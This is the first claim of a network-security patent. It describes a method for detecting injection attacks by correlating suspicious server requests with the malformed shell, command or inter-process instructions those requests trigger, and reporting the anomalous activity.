| CPC H04L 63/1425 (2013.01) [H04L 43/0876 (2013.01); H04L 63/1433 (2013.01); H04L 63/1466 (2013.01)] | 17 Claims |
|
1. A method for monitoring network traffic using one or more network computers, comprising:
determining one or more requests as suspicious that are provided to a server in a monitored network based on one or more characteristics of the one or more provided requests, wherein correlation information is determined for the one or more suspicious requests;
employing one or more characteristics of one or more dependent actions performed by the server to provide other correlation information for the one or more dependent actions, wherein the one or more dependent actions are evaluated for association with anomalous activity based on the correlation information and the other correlation information, wherein the anomalous activity comprises, an injection attack based on malformed information included in the one or more suspicious requests that is associated with one or more malformed shell instruction, malformed command instruction, or malformed inter-process communication associated with the one or more dependent actions;
determining the other malformed information that is included in the one or more dependent actions based on an association with the malformed information that is included in the one or more suspicious request;
employing one or more characteristics of the one or more suspicious requests to provide one or more correlations associated with the one or more suspicious requests;
providing the evaluation of the one or more dependent actions for anomalous activity based on the one or more correlations associated with the one or more suspicious requests; and
providing one or more reports that include information associated with the anomalous activity by the server and the one or more other servers in the monitored network.
|